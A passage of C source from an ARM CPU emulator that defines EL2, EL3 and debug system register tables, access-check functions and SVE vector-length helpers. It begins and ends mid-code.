.fieldoffset = offsetof(CPUARMState, cp15.tpidr_el[2]) }, { .name = "TTBR0_EL2", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 4, .crn = 2, .crm = 0, .opc2 = 0, .access = PL2_RW, .resetvalue = 0, .writefn = vmsa_tcr_ttbr_el2_write, .fieldoffset = offsetof(CPUARMState, cp15.ttbr0_el[2]) }, { .name = "HTTBR", .cp = 15, .opc1 = 4, .crm = 2, .access = PL2_RW, .type = ARM_CP_64BIT | ARM_CP_ALIAS, .fieldoffset = offsetof(CPUARMState, cp15.ttbr0_el[2]) }, { .name = "TLBIALLNSNH", .cp = 15, .opc1 = 4, .crn = 8, .crm = 7, .opc2 = 4, .type = ARM_CP_NO_RAW, .access = PL2_W, .writefn = tlbiall_nsnh_write }, { .name = "TLBIALLNSNHIS", .cp = 15, .opc1 = 4, .crn = 8, .crm = 3, .opc2 = 4, .type = ARM_CP_NO_RAW, .access = PL2_W, .writefn = tlbiall_nsnh_is_write }, { .name = "TLBIALLH", .cp = 15, .opc1 = 4, .crn = 8, .crm = 7, .opc2 = 0, .type = ARM_CP_NO_RAW, .access = PL2_W, .writefn = tlbiall_hyp_write }, { .name = "TLBIALLHIS", .cp = 15, .opc1 = 4, .crn = 8, .crm = 3, .opc2 = 0, .type = ARM_CP_NO_RAW, .access = PL2_W, .writefn = tlbiall_hyp_is_write }, { .name = "TLBIMVAH", .cp = 15, .opc1 = 4, .crn = 8, .crm = 7, .opc2 = 1, .type = ARM_CP_NO_RAW, .access = PL2_W, .writefn = tlbimva_hyp_write }, { .name = "TLBIMVAHIS", .cp = 15, .opc1 = 4, .crn = 8, .crm = 3, .opc2 = 1, .type = ARM_CP_NO_RAW, .access = PL2_W, .writefn = tlbimva_hyp_is_write }, { .name = "TLBI_ALLE2", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 4, .crn = 8, .crm = 7, .opc2 = 0, .type = ARM_CP_NO_RAW, .access = PL2_W, .writefn = tlbi_aa64_alle2_write }, { .name = "TLBI_VAE2", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 4, .crn = 8, .crm = 7, .opc2 = 1, .type = ARM_CP_NO_RAW, .access = PL2_W, .writefn = tlbi_aa64_vae2_write }, { .name = "TLBI_VALE2", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 4, .crn = 8, .crm = 7, .opc2 = 5, .access = PL2_W, .type = ARM_CP_NO_RAW, .writefn = tlbi_aa64_vae2_write }, { .name = "TLBI_ALLE2IS", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 4, .crn = 8, .crm = 3, .opc2 = 0, .access = PL2_W, .type = ARM_CP_NO_RAW, .writefn = tlbi_aa64_alle2is_write }, { .name = "TLBI_VAE2IS", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 4, .crn = 8, .crm = 3, .opc2 = 1, .type = ARM_CP_NO_RAW, .access = PL2_W, .writefn = tlbi_aa64_vae2is_write }, { .name = "TLBI_VALE2IS", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 4, .crn = 8, .crm = 3, .opc2 = 5, .access = PL2_W, .type = ARM_CP_NO_RAW, .writefn = tlbi_aa64_vae2is_write }, /* Unlike the other EL2-related AT operations, these must * UNDEF from EL3 if EL2 is not implemented, which is why we * define them here rather than with the rest of the AT ops. */ { .name = "AT_S1E2R", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 4, .crn = 7, .crm = 8, .opc2 = 0, .access = PL2_W, .accessfn = at_s1e2_access, .type = ARM_CP_NO_RAW | ARM_CP_RAISES_EXC, .writefn = ats_write64 }, { .name = "AT_S1E2W", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 4, .crn = 7, .crm = 8, .opc2 = 1, .access = PL2_W, .accessfn = at_s1e2_access, .type = ARM_CP_NO_RAW | ARM_CP_RAISES_EXC, .writefn = ats_write64 }, /* The AArch32 ATS1H* operations are CONSTRAINED UNPREDICTABLE * if EL2 is not implemented; we choose to UNDEF. Behaviour at EL3 * with SCR.NS == 0 outside Monitor mode is UNPREDICTABLE; we choose * to behave as if SCR.NS was 1. */ { .name = "ATS1HR", .cp = 15, .opc1 = 4, .crn = 7, .crm = 8, .opc2 = 0, .access = PL2_W, .writefn = ats1h_write, .type = ARM_CP_NO_RAW | ARM_CP_RAISES_EXC }, { .name = "ATS1HW", .cp = 15, .opc1 = 4, .crn = 7, .crm = 8, .opc2 = 1, .access = PL2_W, .writefn = ats1h_write, .type = ARM_CP_NO_RAW | ARM_CP_RAISES_EXC }, { .name = "CNTHCTL_EL2", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 4, .crn = 14, .crm = 1, .opc2 = 0, /* ARMv7 requires bit 0 and 1 to reset to 1. ARMv8 defines the * reset values as IMPDEF. We choose to reset to 3 to comply with * both ARMv7 and ARMv8. */ .access = PL2_RW, .resetvalue = 3, .fieldoffset = offsetof(CPUARMState, cp15.cnthctl_el2) }, { .name = "CNTVOFF_EL2", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 4, .crn = 14, .crm = 0, .opc2 = 3, .access = PL2_RW, .type = ARM_CP_IO, .resetvalue = 0, .writefn = gt_cntvoff_write, .fieldoffset = offsetof(CPUARMState, cp15.cntvoff_el2) }, { .name = "CNTVOFF", .cp = 15, .opc1 = 4, .crm = 14, .access = PL2_RW, .type = ARM_CP_64BIT | ARM_CP_ALIAS | ARM_CP_IO, .writefn = gt_cntvoff_write, .fieldoffset = offsetof(CPUARMState, cp15.cntvoff_el2) }, { .name = "CNTHP_CVAL_EL2", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 4, .crn = 14, .crm = 2, .opc2 = 2, .fieldoffset = offsetof(CPUARMState, cp15.c14_timer[GTIMER_HYP].cval), .type = ARM_CP_IO, .access = PL2_RW, .writefn = gt_hyp_cval_write, .raw_writefn = raw_write }, { .name = "CNTHP_CVAL", .cp = 15, .opc1 = 6, .crm = 14, .fieldoffset = offsetof(CPUARMState, cp15.c14_timer[GTIMER_HYP].cval), .access = PL2_RW, .type = ARM_CP_64BIT | ARM_CP_IO, .writefn = gt_hyp_cval_write, .raw_writefn = raw_write }, { .name = "CNTHP_TVAL_EL2", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 4, .crn = 14, .crm = 2, .opc2 = 0, .type = ARM_CP_NO_RAW | ARM_CP_IO, .access = PL2_RW, .resetfn = gt_hyp_timer_reset, .readfn = gt_hyp_tval_read, .writefn = gt_hyp_tval_write }, { .name = "CNTHP_CTL_EL2", .state = ARM_CP_STATE_BOTH, .type = ARM_CP_IO, .opc0 = 3, .opc1 = 4, .crn = 14, .crm = 2, .opc2 = 1, .access = PL2_RW, .fieldoffset = offsetof(CPUARMState, cp15.c14_timer[GTIMER_HYP].ctl), .resetvalue = 0, .writefn = gt_hyp_ctl_write, .raw_writefn = raw_write }, /* The only field of MDCR_EL2 that has a defined architectural reset value * is MDCR_EL2.HPMN which should reset to the value of PMCR_EL0.N; but we * don't implement any PMU event counters, so using zero as a reset * value for MDCR_EL2 is okay */ { .name = "MDCR_EL2", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 4, .crn = 1, .crm = 1, .opc2 = 1, .access = PL2_RW, .resetvalue = 0, .fieldoffset = offsetof(CPUARMState, cp15.mdcr_el2), }, { .name = "HPFAR", .state = ARM_CP_STATE_AA32, .cp = 15, .opc1 = 4, .crn = 6, .crm = 0, .opc2 = 4, .access = PL2_RW, .accessfn = access_el3_aa32ns, .fieldoffset = offsetof(CPUARMState, cp15.hpfar_el2) }, { .name = "HPFAR_EL2", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 4, .crn = 6, .crm = 0, .opc2 = 4, .access = PL2_RW, .fieldoffset = offsetof(CPUARMState, cp15.hpfar_el2) }, { .name = "HSTR_EL2", .state = ARM_CP_STATE_BOTH, .cp = 15, .opc0 = 3, .opc1 = 4, .crn = 1, .crm = 1, .opc2 = 3, .access = PL2_RW, .fieldoffset = offsetof(CPUARMState, cp15.hstr_el2) }, REGINFO_SENTINEL }; static const ARMCPRegInfo el2_v8_cp_reginfo[] = { { .name = "HCR2", .state = ARM_CP_STATE_AA32, .type = ARM_CP_ALIAS | ARM_CP_IO, .cp = 15, .opc1 = 4, .crn = 1, .crm = 1, .opc2 = 4, .access = PL2_RW, .fieldoffset = offsetofhigh32(CPUARMState, cp15.hcr_el2), .writefn = hcr_writehigh }, REGINFO_SENTINEL }; static CPAccessResult nsacr_access(CPUARMState *env, const ARMCPRegInfo *ri, bool isread) { /* The NSACR is RW at EL3, and RO for NS EL1 and NS EL2. * At Secure EL1 it traps to EL3. */ if (arm_current_el(env) == 3) { return CP_ACCESS_OK; } if (arm_is_secure_below_el3(env)) { return CP_ACCESS_TRAP_EL3; } /* Accesses from EL1 NS and EL2 NS are UNDEF for write but allow reads. */ if (isread) { return CP_ACCESS_OK; } return CP_ACCESS_TRAP_UNCATEGORIZED; } static const ARMCPRegInfo el3_cp_reginfo[] = { { .name = "SCR_EL3", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 6, .crn = 1, .crm = 1, .opc2 = 0, .access = PL3_RW, .fieldoffset = offsetof(CPUARMState, cp15.scr_el3), .resetvalue = 0, .writefn = scr_write }, { .name = "SCR", .type = ARM_CP_ALIAS | ARM_CP_NEWEL, .cp = 15, .opc1 = 0, .crn = 1, .crm = 1, .opc2 = 0, .access = PL1_RW, .accessfn = access_trap_aa32s_el1, .fieldoffset = offsetoflow32(CPUARMState, cp15.scr_el3), .writefn = scr_write }, { .name = "SDER32_EL3", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 6, .crn = 1, .crm = 1, .opc2 = 1, .access = PL3_RW, .resetvalue = 0, .fieldoffset = offsetof(CPUARMState, cp15.sder) }, { .name = "SDER", .cp = 15, .opc1 = 0, .crn = 1, .crm = 1, .opc2 = 1, .access = PL3_RW, .resetvalue = 0, .fieldoffset = offsetoflow32(CPUARMState, cp15.sder) }, { .name = "MVBAR", .cp = 15, .opc1 = 0, .crn = 12, .crm = 0, .opc2 = 1, .access = PL1_RW, .accessfn = access_trap_aa32s_el1, .writefn = vbar_write, .resetvalue = 0, .fieldoffset = offsetof(CPUARMState, cp15.mvbar) }, { .name = "TTBR0_EL3", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 6, .crn = 2, .crm = 0, .opc2 = 0, .access = PL3_RW, .resetvalue = 0, .fieldoffset = offsetof(CPUARMState, cp15.ttbr0_el[3]) }, { .name = "TCR_EL3", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 6, .crn = 2, .crm = 0, .opc2 = 2, .access = PL3_RW, /* no .writefn needed as this can't cause an ASID change; * we must provide a .raw_writefn and .resetfn because we handle * reset and migration for the AArch32 TTBCR(S), which might be * using mask and base_mask. */ .resetfn = vmsa_ttbcr_reset, .raw_writefn = vmsa_ttbcr_raw_write, .fieldoffset = offsetof(CPUARMState, cp15.tcr_el[3]) }, { .name = "ELR_EL3", .state = ARM_CP_STATE_AA64, .type = ARM_CP_ALIAS, .opc0 = 3, .opc1 = 6, .crn = 4, .crm = 0, .opc2 = 1, .access = PL3_RW, .fieldoffset = offsetof(CPUARMState, elr_el[3]) }, { .name = "ESR_EL3", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 6, .crn = 5, .crm = 2, .opc2 = 0, .access = PL3_RW, .fieldoffset = offsetof(CPUARMState, cp15.esr_el[3]) }, { .name = "FAR_EL3", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 6, .crn = 6, .crm = 0, .opc2 = 0, .access = PL3_RW, .fieldoffset = offsetof(CPUARMState, cp15.far_el[3]) }, { .name = "SPSR_EL3", .state = ARM_CP_STATE_AA64, .type = ARM_CP_ALIAS, .opc0 = 3, .opc1 = 6, .crn = 4, .crm = 0, .opc2 = 0, .access = PL3_RW, .fieldoffset = offsetof(CPUARMState, banked_spsr[BANK_MON]) }, { .name = "VBAR_EL3", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 6, .crn = 12, .crm = 0, .opc2 = 0, .access = PL3_RW, .writefn = vbar_write, .fieldoffset = offsetof(CPUARMState, cp15.vbar_el[3]), .resetvalue = 0 }, { .name = "CPTR_EL3", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 6, .crn = 1, .crm = 1, .opc2 = 2, .access = PL3_RW, .accessfn = cptr_access, .resetvalue = 0, .fieldoffset = offsetof(CPUARMState, cp15.cptr_el[3]) }, { .name = "TPIDR_EL3", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 6, .crn = 13, .crm = 0, .opc2 = 2, .access = PL3_RW, .resetvalue = 0, .fieldoffset = offsetof(CPUARMState, cp15.tpidr_el[3]) }, { .name = "AMAIR_EL3", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 6, .crn = 10, .crm = 3, .opc2 = 0, .access = PL3_RW, .type = ARM_CP_CONST, .resetvalue = 0 }, { .name = "AFSR0_EL3", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 6, .crn = 5, .crm = 1, .opc2 = 0, .access = PL3_RW, .type = ARM_CP_CONST, .resetvalue = 0 }, { .name = "AFSR1_EL3", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 6, .crn = 5, .crm = 1, .opc2 = 1, .access = PL3_RW, .type = ARM_CP_CONST, .resetvalue = 0 }, { .name = "TLBI_ALLE3IS", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 6, .crn = 8, .crm = 3, .opc2 = 0, .access = PL3_W, .type = ARM_CP_NO_RAW, .writefn = tlbi_aa64_alle3is_write }, { .name = "TLBI_VAE3IS", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 6, .crn = 8, .crm = 3, .opc2 = 1, .access = PL3_W, .type = ARM_CP_NO_RAW, .writefn = tlbi_aa64_vae3is_write }, { .name = "TLBI_VALE3IS", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 6, .crn = 8, .crm = 3, .opc2 = 5, .access = PL3_W, .type = ARM_CP_NO_RAW, .writefn = tlbi_aa64_vae3is_write }, { .name = "TLBI_ALLE3", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 6, .crn = 8, .crm = 7, .opc2 = 0, .access = PL3_W, .type = ARM_CP_NO_RAW, .writefn = tlbi_aa64_alle3_write }, { .name = "TLBI_VAE3", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 6, .crn = 8, .crm = 7, .opc2 = 1, .access = PL3_W, .type = ARM_CP_NO_RAW, .writefn = tlbi_aa64_vae3_write }, { .name = "TLBI_VALE3", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 6, .crn = 8, .crm = 7, .opc2 = 5, .access = PL3_W, .type = ARM_CP_NO_RAW, .writefn = tlbi_aa64_vae3_write }, REGINFO_SENTINEL }; static void define_arm_vh_e2h_redirects_aliases(ARMCPU *cpu) { #if 0 struct E2HAlias { uint32_t src_key, dst_key, new_key; const char *src_name, *dst_name, *new_name; bool (*feature)(const ARMISARegisters *id); }; #define K(op0, op1, crn, crm, op2) \ ENCODE_AA64_CP_REG(CP_REG_ARM64_SYSREG_CP, crn, crm, op0, op1, op2) static const struct E2HAlias aliases[] = { { K(3, 0, 1, 0, 0), K(3, 4, 1, 0, 0), K(3, 5, 1, 0, 0), "SCTLR", "SCTLR_EL2", "SCTLR_EL12" }, { K(3, 0, 1, 0, 2), K(3, 4, 1, 1, 2), K(3, 5, 1, 0, 2), "CPACR", "CPTR_EL2", "CPACR_EL12" }, { K(3, 0, 2, 0, 0), K(3, 4, 2, 0, 0), K(3, 5, 2, 0, 0), "TTBR0_EL1", "TTBR0_EL2", "TTBR0_EL12" }, { K(3, 0, 2, 0, 1), K(3, 4, 2, 0, 1), K(3, 5, 2, 0, 1), "TTBR1_EL1", "TTBR1_EL2", "TTBR1_EL12" }, { K(3, 0, 2, 0, 2), K(3, 4, 2, 0, 2), K(3, 5, 2, 0, 2), "TCR_EL1", "TCR_EL2", "TCR_EL12" }, { K(3, 0, 4, 0, 0), K(3, 4, 4, 0, 0), K(3, 5, 4, 0, 0), "SPSR_EL1", "SPSR_EL2", "SPSR_EL12" }, { K(3, 0, 4, 0, 1), K(3, 4, 4, 0, 1), K(3, 5, 4, 0, 1), "ELR_EL1", "ELR_EL2", "ELR_EL12" }, { K(3, 0, 5, 1, 0), K(3, 4, 5, 1, 0), K(3, 5, 5, 1, 0), "AFSR0_EL1", "AFSR0_EL2", "AFSR0_EL12" }, { K(3, 0, 5, 1, 1), K(3, 4, 5, 1, 1), K(3, 5, 5, 1, 1), "AFSR1_EL1", "AFSR1_EL2", "AFSR1_EL12" }, { K(3, 0, 5, 2, 0), K(3, 4, 5, 2, 0), K(3, 5, 5, 2, 0), "ESR_EL1", "ESR_EL2", "ESR_EL12" }, { K(3, 0, 6, 0, 0), K(3, 4, 6, 0, 0), K(3, 5, 6, 0, 0), "FAR_EL1", "FAR_EL2", "FAR_EL12" }, { K(3, 0, 10, 2, 0), K(3, 4, 10, 2, 0), K(3, 5, 10, 2, 0), "MAIR_EL1", "MAIR_EL2", "MAIR_EL12" }, { K(3, 0, 10, 3, 0), K(3, 4, 10, 3, 0), K(3, 5, 10, 3, 0), "AMAIR0", "AMAIR_EL2", "AMAIR_EL12" }, { K(3, 0, 12, 0, 0), K(3, 4, 12, 0, 0), K(3, 5, 12, 0, 0), "VBAR", "VBAR_EL2", "VBAR_EL12" }, { K(3, 0, 13, 0, 1), K(3, 4, 13, 0, 1), K(3, 5, 13, 0, 1), "CONTEXTIDR_EL1", "CONTEXTIDR_EL2", "CONTEXTIDR_EL12" }, { K(3, 0, 14, 1, 0), K(3, 4, 14, 1, 0), K(3, 5, 14, 1, 0), "CNTKCTL", "CNTHCTL_EL2", "CNTKCTL_EL12" }, /* * Note that redirection of ZCR is mentioned in the description * of ZCR_EL2, and aliasing in the description of ZCR_EL1, but * not in the summary table. */ { K(3, 0, 1, 2, 0), K(3, 4, 1, 2, 0), K(3, 5, 1, 2, 0), "ZCR_EL1", "ZCR_EL2", "ZCR_EL12", isar_feature_aa64_sve }, /* TODO: ARMv8.2-SPE -- PMSCR_EL2 */ /* TODO: ARMv8.4-Trace -- TRFCR_EL2 */ }; #undef K size_t i; for (i = 0; i < ARRAY_SIZE(aliases); i++) { const struct E2HAlias *a = &aliases[i]; ARMCPRegInfo *src_reg, *dst_reg; if (a->feature && !a->feature(&cpu->isar)) { continue; } src_reg = g_hash_table_lookup(cpu->cp_regs, &a->src_key); dst_reg = g_hash_table_lookup(cpu->cp_regs, &a->dst_key); g_assert(src_reg != NULL); g_assert(dst_reg != NULL); /* Cross-compare names to detect typos in the keys. */ g_assert(strcmp(src_reg->name, a->src_name) == 0); g_assert(strcmp(dst_reg->name, a->dst_name) == 0); /* None of the core system registers use opaque; we will. */ g_assert(src_reg->opaque == NULL); /* Create alias before redirection so we dup the right data. */ if (a->new_key) { ARMCPRegInfo *new_reg = g_memdup(src_reg, sizeof(ARMCPRegInfo)); uint32_t *new_key = g_memdup(&a->new_key, sizeof(uint32_t)); bool ok; new_reg->name = a->new_name; new_reg->type |= ARM_CP_ALIAS; /* Remove PL1/PL0 access, leaving PL2/PL3 R/W in place. */ new_reg->access &= PL2_RW | PL3_RW; ok = g_hash_table_insert(cpu->cp_regs, new_key, new_reg); g_assert(ok); } src_reg->opaque = dst_reg; src_reg->orig_readfn = src_reg->readfn ?: raw_read; src_reg->orig_writefn = src_reg->writefn ?: raw_write; if (!src_reg->raw_readfn) { src_reg->raw_readfn = raw_read; } if (!src_reg->raw_writefn) { src_reg->raw_writefn = raw_write; } src_reg->readfn = el2_e2h_read; src_reg->writefn = el2_e2h_write; } #endif } static CPAccessResult ctr_el0_access(CPUARMState *env, const ARMCPRegInfo *ri, bool isread) { int cur_el = arm_current_el(env); if (cur_el < 2) { uint64_t hcr = arm_hcr_el2_eff(env); if (cur_el == 0) { if ((hcr & (HCR_E2H | HCR_TGE)) == (HCR_E2H | HCR_TGE)) { if (!(env->cp15.sctlr_el[2] & SCTLR_UCT)) { return CP_ACCESS_TRAP_EL2; } } else { if (!(env->cp15.sctlr_el[1] & SCTLR_UCT)) { return CP_ACCESS_TRAP; } if (hcr & HCR_TID2) { return CP_ACCESS_TRAP_EL2; } } } else if (hcr & HCR_TID2) { return CP_ACCESS_TRAP_EL2; } } if (arm_current_el(env) < 2 && arm_hcr_el2_eff(env) & HCR_TID2) { return CP_ACCESS_TRAP_EL2; } return CP_ACCESS_OK; } static void oslar_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { /* Writes to OSLAR_EL1 may update the OS lock status, which can be * read via a bit in OSLSR_EL1. */ int oslock; if (ri->state == ARM_CP_STATE_AA32) { oslock = (value == 0xC5ACCE55); } else { oslock = value & 1; } env->cp15.oslsr_el1 = deposit32(env->cp15.oslsr_el1, 1, 1, oslock); } static const ARMCPRegInfo debug_cp_reginfo[] = { /* DBGDRAR, DBGDSAR: always RAZ since we don't implement memory mapped * debug components. The AArch64 version of DBGDRAR is named MDRAR_EL1; * unlike DBGDRAR it is never accessible from EL0. * DBGDSAR is deprecated and must RAZ from v8 anyway, so it has no AArch64 * accessor. */ { .name = "DBGDRAR", .cp = 14, .crn = 1, .crm = 0, .opc1 = 0, .opc2 = 0, .access = PL0_R, .accessfn = access_tdra, .type = ARM_CP_CONST, .resetvalue = 0 }, { .name = "MDRAR_EL1", .state = ARM_CP_STATE_AA64, .opc0 = 2, .opc1 = 0, .crn = 1, .crm = 0, .opc2 = 0, .access = PL1_R, .accessfn = access_tdra, .type = ARM_CP_CONST, .resetvalue = 0 }, { .name = "DBGDSAR", .cp = 14, .crn = 2, .crm = 0, .opc1 = 0, .opc2 = 0, .access = PL0_R, .accessfn = access_tdra, .type = ARM_CP_CONST, .resetvalue = 0 }, /* Monitor debug system control register; the 32-bit alias is DBGDSCRext. */ { .name = "MDSCR_EL1", .state = ARM_CP_STATE_BOTH, .cp = 14, .opc0 = 2, .opc1 = 0, .crn = 0, .crm = 2, .opc2 = 2, .access = PL1_RW, .accessfn = access_tda, .fieldoffset = offsetof(CPUARMState, cp15.mdscr_el1), .resetvalue = 0 }, /* MDCCSR_EL0, aka DBGDSCRint. This is a read-only mirror of MDSCR_EL1. * We don't implement the configurable EL0 access. */ { .name = "MDCCSR_EL0", .state = ARM_CP_STATE_BOTH, .cp = 14, .opc0 = 2, .opc1 = 0, .crn = 0, .crm = 1, .opc2 = 0, .type = ARM_CP_ALIAS, .access = PL1_R, .accessfn = access_tda, .fieldoffset = offsetof(CPUARMState, cp15.mdscr_el1), }, { .name = "OSLAR_EL1", .state = ARM_CP_STATE_BOTH, .cp = 14, .opc0 = 2, .opc1 = 0, .crn = 1, .crm = 0, .opc2 = 4, .access = PL1_W, .type = ARM_CP_NO_RAW, .accessfn = access_tdosa, .writefn = oslar_write }, { .name = "OSLSR_EL1", .state = ARM_CP_STATE_BOTH, .cp = 14, .opc0 = 2, .opc1 = 0, .crn = 1, .crm = 1, .opc2 = 4, .access = PL1_R, .resetvalue = 10, .accessfn = access_tdosa, .fieldoffset = offsetof(CPUARMState, cp15.oslsr_el1) }, /* Dummy OSDLR_EL1: 32-bit Linux will read this */ { .name = "OSDLR_EL1", .state = ARM_CP_STATE_BOTH, .cp = 14, .opc0 = 2, .opc1 = 0, .crn = 1, .crm = 3, .opc2 = 4, .access = PL1_RW, .accessfn = access_tdosa, .type = ARM_CP_NOP }, /* Dummy DBGVCR: Linux wants to clear this on startup, but we don't * implement vector catch debug events yet. */ { .name = "DBGVCR", .cp = 14, .opc1 = 0, .crn = 0, .crm = 7, .opc2 = 0, .access = PL1_RW, .accessfn = access_tda, .type = ARM_CP_NOP }, /* Dummy DBGVCR32_EL2 (which is only for a 64-bit hypervisor * to save and restore a 32-bit guest's DBGVCR) */ { .name = "DBGVCR32_EL2", .state = ARM_CP_STATE_AA64, .opc0 = 2, .opc1 = 4, .crn = 0, .crm = 7, .opc2 = 0, .access = PL2_RW, .accessfn = access_tda, .type = ARM_CP_NOP }, /* Dummy MDCCINT_EL1, since we don't implement the Debug Communications * Channel but Linux may try to access this register. The 32-bit * alias is DBGDCCINT. */ { .name = "MDCCINT_EL1", .state = ARM_CP_STATE_BOTH, .cp = 14, .opc0 = 2, .opc1 = 0, .crn = 0, .crm = 2, .opc2 = 0, .access = PL1_RW, .accessfn = access_tda, .type = ARM_CP_NOP }, REGINFO_SENTINEL }; static const ARMCPRegInfo debug_lpae_cp_reginfo[] = { /* 64 bit access versions of the (dummy) debug registers */ { .name = "DBGDRAR", .cp = 14, .crm = 1, .opc1 = 0, .access = PL0_R, .type = ARM_CP_CONST|ARM_CP_64BIT, .resetvalue = 0 }, { .name = "DBGDSAR", .cp = 14, .crm = 2, .opc1 = 0, .access = PL0_R, .type = ARM_CP_CONST|ARM_CP_64BIT, .resetvalue = 0 }, REGINFO_SENTINEL }; /* Return the exception level to which exceptions should be taken * via SVEAccessTrap. If an exception should be routed through * AArch64.AdvSIMDFPAccessTrap, return 0; fp_exception_el should * take care of raising that exception. * C.f. the ARM pseudocode function CheckSVEEnabled. */ int sve_exception_el(CPUARMState *env, int el) { uint64_t hcr_el2 = arm_hcr_el2_eff(env); if (el <= 1 && (hcr_el2 & (HCR_E2H | HCR_TGE)) != (HCR_E2H | HCR_TGE)) { bool disabled = false; /* The CPACR.ZEN controls traps to EL1: * 0, 2 : trap EL0 and EL1 accesses * 1 : trap only EL0 accesses * 3 : trap no accesses */ if (!extract32(env->cp15.cpacr_el1, 16, 1)) { disabled = true; } else if (!extract32(env->cp15.cpacr_el1, 17, 1)) { disabled = el == 0; } if (disabled) { /* route_to_el2 */ return hcr_el2 & HCR_TGE ? 2 : 1; } /* Check CPACR.FPEN. */ if (!extract32(env->cp15.cpacr_el1, 20, 1)) { disabled = true; } else if (!extract32(env->cp15.cpacr_el1, 21, 1)) { disabled = el == 0; } if (disabled) { return 0; } } /* CPTR_EL2. Since TZ and TFP are positive, * they will be zero when EL2 is not present. */ if (el <= 2 && !arm_is_secure_below_el3(env)) { if (env->cp15.cptr_el[2] & CPTR_TZ) { return 2; } if (env->cp15.cptr_el[2] & CPTR_TFP) { return 0; } } /* CPTR_EL3. Since EZ is negative we must check for EL3. */ if (arm_feature(env, ARM_FEATURE_EL3) && !(env->cp15.cptr_el[3] & CPTR_EZ)) { return 3; } return 0; } static uint32_t sve_zcr_get_valid_len(ARMCPU *cpu, uint32_t start_len) { uint32_t end_len; end_len = start_len &= 0xf; if (!test_bit(start_len, cpu->sve_vq_map)) { end_len = find_last_bit(cpu->sve_vq_map, start_len); assert(end_len < start_len); } return end_len; } /* * Given that SVE is enabled, return the vector length for EL. */ uint32_t sve_zcr_len_for_el(CPUARMState *env, int el) { ARMCPU *cpu = env_archcpu(env); uint32_t zcr_len = cpu->sve_max_vq - 1; if (el <= 1) { zcr_len = MIN(zcr_len, 0xf & (uint32_t)env->vfp.zcr_el[1]); } if (el <= 2 && arm_feature(env, ARM_FEATURE_EL2)) { zcr_len = MIN(zcr_len, 0xf & (uint32_t)env->vfp.zcr_el[2]); } if (arm_feature(env, ARM_FEATURE_EL3)) { zcr_len = MIN(zcr_len, 0xf & (uint32_t)env->vfp.zcr_el[3]); } return sve_zcr_get_valid_len(cpu, zcr_len); } static void zcr_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { int cur_el = arm_current_el(env); int old_len = sve_zcr_len_for_el(env, cur_el); int new_len; /* Bits other than [3:0] are RAZ/WI. */ QEMU_BUILD_BUG_ON(ARM_MAX_VQ > 16); raw_write(env, ri, value & 0xf); /* * Because we arrived here, we know both FP and SVE are enabled; * otherwise we would have trapped access to the ZCR_ELn register. */ new_len = sve_zcr_len_for_el(env, cur_el); if (new_len < old_len) { aarch64_sve_narrow_vq(env, new_len + 1); } } static const ARMCPRegInfo zcr_el1_reginfo = { .name = "ZCR_EL1", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 1, .crm = 2, .opc2 = 0, .access = PL1_RW, .type = ARM_CP_SVE, .fieldoffset = offsetof(CPUARMState, vfp.zcr_el[1]), .writefn = zcr_write, .raw_writefn = raw_write }; static const ARMCPRegInfo zcr_el2_reginfo = { .name = "ZCR_EL2", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 4, .crn = 1, .crm = 2, .opc2 = 0, .access = PL2_RW, .type = ARM_CP_SVE, .fieldoffset = offsetof(CPUARMState, vfp.zcr_el[2]), .writefn = zcr_write, .raw_writefn = raw_write }; static const ARMCPRegInfo zcr_no_el2_reginfo = { .name = "ZCR_EL2", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 4, .crn = 1, .crm = 2, .opc2 = 0, .access = PL2_RW, .type = ARM_CP_SVE, .readfn = arm_cp_read_zero, .writefn = arm_cp_write_ignore }; static const ARMCPRegInfo zcr_el3_reginfo = { .name = "ZCR_EL3", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 6, .crn = 1, .crm = 2, .opc2 = 0, .access = PL3_RW, .type = ARM_CP_SVE, .fieldoffset = offsetof(CPUARMState, vfp.zcr_el[3]), .writefn = zcr_write, .raw_writefn = raw_write }; void hw_watchpoint_update(ARMCPU *cpu, int n) { CPUARMState *env = &cpu->env; vaddr len = 0; vaddr wvr = env->cp15.dbgwvr[n]; uint64_t wcr = env->cp15.dbgwcr[n]; int mask; int flags = BP_CPU | BP_STOP_BEFORE_ACCESS; if 